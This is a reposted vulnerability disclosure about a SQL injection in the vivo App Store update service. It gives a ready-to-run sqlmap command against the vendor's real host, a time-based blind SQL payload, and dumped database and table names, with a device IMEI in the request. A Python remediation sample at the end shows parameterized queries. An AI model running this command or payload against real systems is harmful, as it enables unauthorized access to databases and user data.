神刀安全网

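Vulnerability title: Another SQL injection in the vivo App Store (getting back up where you fell)

Vulnerability details

Disclosure status:

2016-04-06: Details reported to the vendor; awaiting vendor response
2016-04-11: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

..Ignored

Detailed description:

Code section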
python sqlmap.py -u "http://update.appstore.vivo.com.cn/port/packages_update/" --data "nt=WIFI&model=vivo+X5Max%2B&packages=com.tencent.mm%7C760%7C%2Ccom.vlife.vivo.wallpaper%7C559%7C%2Ccn.wps.moffice_eng%7C149%7C%2Cnet.openvpn.openvpn%7C74%7C%2Ccom.naver.linewebtoon%7C151101%7C%2Ccom.qiyi.video%7C88%7C%2Ccom.baidu.BaiduMap%7C740%7C%2Ccom.dmm.games.touken%7C32%7C%2Ccom.baidu.appsearch%7C16787600%7C%2Ccom.easyovpn.easyovpn%7C150827263%7C%2Ccom.tudou.android%7C65%7C%2Ccom.windfindtech.ishanghai%7C22%7C%2Ccom.tencent.mobileqq%7C348%7C%2Ccom.huati%7C20141238%7C%2Ccom.google.android.syncadapters.calendar%7C16%7C%2Ccom.sankuai.meituan%7C361%7C%2Ckvpioneer.safecenter%7C6%7C%2Ccom.taobao.taobao%7C131%7C%2Ccom.bbk.appstore%7C622%7C%2Ccom.vivo.game%7C38%7C%2Ccom.vivo.browser%7C4420%7C%2Ccom.android.browser%7C59999%7C%2Ccom.chaozh.iReader%7C431%7C%2Ccom.vivo.space%7C13%7C&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4&dbversion=0&s=2%7C4273816697"

Code section
---
Parameter: an (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: nt=WIFI&model=vivo X5Max+&packages=com.tencent.mm|760|,com.vlife.vivo.wallpaper|559|,cn.wps.moffice_eng|149|,net.openvpn.openvpn|74|,com.naver.linewebtoon|151101|,com.qiyi.video|88|,com.baidu.BaiduMap|740|,com.dmm.games.touken|32|,com.baidu.appsearch|16787600|,com.easyovpn.easyovpn|150827263|,com.tudou.android|65|,com.windfindtech.ishanghai|22|,com.tencent.mobileqq|348|,com.huati|20141238|,com.google.android.syncadapters.calendar|16|,com.sankuai.meituan|361|,kvpioneer.safecenter|6|,com.taobao.taobao|131|,com.bbk.appstore|622|,com.vivo.game|38|,com.vivo.browser|4420|,com.android.browser|59999|,com.chaozh.iReader|431|,com.vivo.space|13|&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj&dbversion=0&s=2|4273816697
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] appcontent
[*] information_schema
[*] test

Proof of vulnerability:

Code section
Database: appcontent
[23 tables]
+-----------------------------+
| :ec_manual_catch_apk |
| comment_tmp |
| t_ac_apk_url |
| t_ac_app_info |
| t_ac_app_info_all |
| t_ac_app_info_hot |
| t_ac_app_s |
| t_ac_app_screenshot |
| t_ac_fail_catch_app |
| t_ac_manual_update_apk |
| t_ac_single_download |
| t_ac_spider_detail_q |
| t_ac_spider_detail_template |
| t_ac_spider_list_task |
| t_ac_spider_list_template |
| t_ac_wdj_icon |
| t_activity_info |
| t_ad_app |
| t_ad_click |
| t_ad_icon |
| t_ad_info |
| t_android_permission |
| t_apk_delete |
+-----------------------------+

Remediation:
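
An added example, not part of the original report and not vivo's code: it contrasts a string-concatenated lookup on the `an` parameter with a bound-parameter lookup plus an allow-list check, using the payload sqlmap reported above. Assumptions: an in-memory SQLite database stands in for the MySQL back end, the table `app_update` and its columns are hypothetical, `an` is taken to be an Android version string, and `SLEEP` is a stub that only records that it was called.

```python
import re
import sqlite3

# Value of the `an` parameter, copied from the sqlmap output in the report.
REPORTED_AN = "4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj"

# Assumption: `an` only ever carries a version string such as "4.4.4".
AN_PATTERN = re.compile(r"\d{1,2}(\.\d{1,3}){0,3}")


def make_db():
    """In-memory SQLite stand-in for the MySQL back end (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    sleep_calls = []
    # SQLite has no SLEEP(); this stub records each call instead of delaying.
    conn.create_function("SLEEP", 1, lambda s: sleep_calls.append(s) or 0)
    conn.execute("CREATE TABLE app_update (package TEXT, min_an TEXT)")
    conn.execute("INSERT INTO app_update VALUES ('com.example.app', '4.4.4')")
    return conn, sleep_calls


def lookup_concatenated(conn, an):
    """'Before': the request value is pasted into the SQL text and can alter it."""
    sql = "SELECT package FROM app_update WHERE min_an = '" + an + "'"
    return conn.execute(sql).fetchall()


def validate_an(an):
    """Allow-list check applied before the value reaches any query."""
    return AN_PATTERN.fullmatch(an) is not None


def lookup_parameterized(conn, an):
    """'After': the value is bound as a parameter and is never parsed as SQL."""
    return conn.execute(
        "SELECT package FROM app_update WHERE min_an = ?", (an,)
    ).fetchall()


if __name__ == "__main__":
    conn, calls = make_db()
    lookup_concatenated(conn, REPORTED_AN)
    print("SLEEP calls, concatenated query:", len(calls))
    calls.clear()
    print("rows, bound query:", lookup_parameterized(conn, REPORTED_AN))
    print("SLEEP calls, bound query:", len(calls))
    print("payload passes allow-list:", validate_an(REPORTED_AN))
```
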

Copyright notice: when reposting, please credit the source sauce@乌云 (WooYun)
